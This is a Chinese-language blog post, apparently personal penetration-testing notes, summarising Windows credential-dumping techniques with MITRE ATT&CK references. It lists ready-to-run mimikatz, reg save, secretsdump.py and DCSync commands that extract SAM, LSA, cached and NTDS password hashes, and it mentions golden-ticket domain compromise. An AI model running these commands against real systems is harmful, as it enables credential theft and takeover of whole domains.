Windows Credential Dumping总结
作者:互联网
一、SAM
reg save HKLM\sam sam reg save HKLM\system system
C:\Windows\System32\config\SAM C:\Windows\System32\config\SYSTEM
lsadump::sam
https://www.cnblogs.com/ring-lcy/p/12442614.html
二、Cached Domain Credentials
reg save HKLM\security security reg save HKLM\system system C:\Windows\System32\config\SECURITY C:\Windows\System32\config\SYSTEM lsadump::cache
https://www.cnblogs.com/ring-lcy/p/12497996.html
三、Local Security Authority (LSA) Secrets
LSA Secret存储在HKEY_LOCAL_MACHINE\SECURITY\Policy\Secrets,笔者暂未找到解密和利用的方法,后面有更新再补~
1. 在线dump lsadump::secrets dump 2. 离线dump reg save HKLM\SYSTEM system reg save HKLM\security security lsadump::secrets /system:system /security:security
四、从Lsass.exe中dump明文密码和Hash
# 注:为了与lsass.exe交互,需要以administrator权限启动mimikatz并获得debug权限;或者以system权限启动mimikatz
mimikatz # privilege::debug mimikatz # sekurlsa::logonpasswords
https://www.cnblogs.com/ring-lcy/p/12442614.html
五:SAM/NTDS
SAM文件储存的是本地账户的NTLM Hash,域账户的NTLM Hash位于域控机器上 C:\Windows\NTDS\ntds.dit,在机器启动过程中是无法直接拷贝的。
通过与LSA Server交互直接拿到SAM和NTDS中储存的Hash, 这种方式与读取SAM,NTDS文件拿到的信息基本一致,但直接与LSASS 交互有可能造成其crash,尤其是在域很大的情况下。
lsadump::lsa /inject lsadump::lsa /patch
也可以指定某个特定账户:
lsadump::lsa /patch /id:[ACCOUNT_ID] lsadump::lsa /patch /name:[ACCOUNT_NAME]
/patch: 在memory中修改了samsrv.dll的逻辑(即patching),从而获取LM/NTLM Hash
/inject: 在Lsass.exe中new了一个新的thread,除LM/NTLM Hash外还可以获取 WDigest and Kerberos keys(怎么利用?),但new thread的行为也易于被发现。
六、NTDS from Domain Controller
域控Active Directory将域账户的NTLM Hash存储在C:\Windows\NTDS\NTDS.dit,该文件需要C:\Windows\System32\config\SYSTEM
registry hive中的key来解码;在系统运行过程中,这两个文件会一直被OS占用,不能直接读取、拷贝。
下面介绍的就是如何读取NTDS、解密出NTLM Hash;域环境中,拿到krbtgt账号hash就可以通过传递黄金票据感染整个域。
1. DCSync
- mimikatz
lsadump::dcsync /domain:[FQDN_DOMAIN] /user:[ACCOUNT] 或 lsadump::dcsync /domain:[FQDN_DOMAIN] /all /csv
-
Impacket secretsdump.py (知道DC的用户名密码的话,可以远程dump)
python secretsdump.py -just-dc-user [ACCOUNT] [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET] 或 python secretsdump.py -just-dc [DOMAIN]/[USERNAME]:[PASSWORD]@[TARGET]
-
Invoke-DCSync.ps1
本质也是调用mimikatz,不过不用以administrator权限启动。
Invoke-DCSync -PWDumpFormat -Users [ACCOUNT]
或 Invoke-DCSync -PWDumpFormat
2. Volume Shadow Copy
- NTDSUtil
域控制器中原生自带ntdsutil.exe,方便管理员使用命令行管理active directory,可以使用它拷贝
- VSSAdmin
- diskshadow
参考:
https://attack.mitre.org/techniques/T1003/
https://pwn.no0.be/post/windows/creds_collection/system/#mimikatz---sekurlsacache
标签:Credential,Hash,Windows,lsadump,system,NTDS,mimikatz,Dumping 来源: https://www.cnblogs.com/ring-lcy/p/12525379.html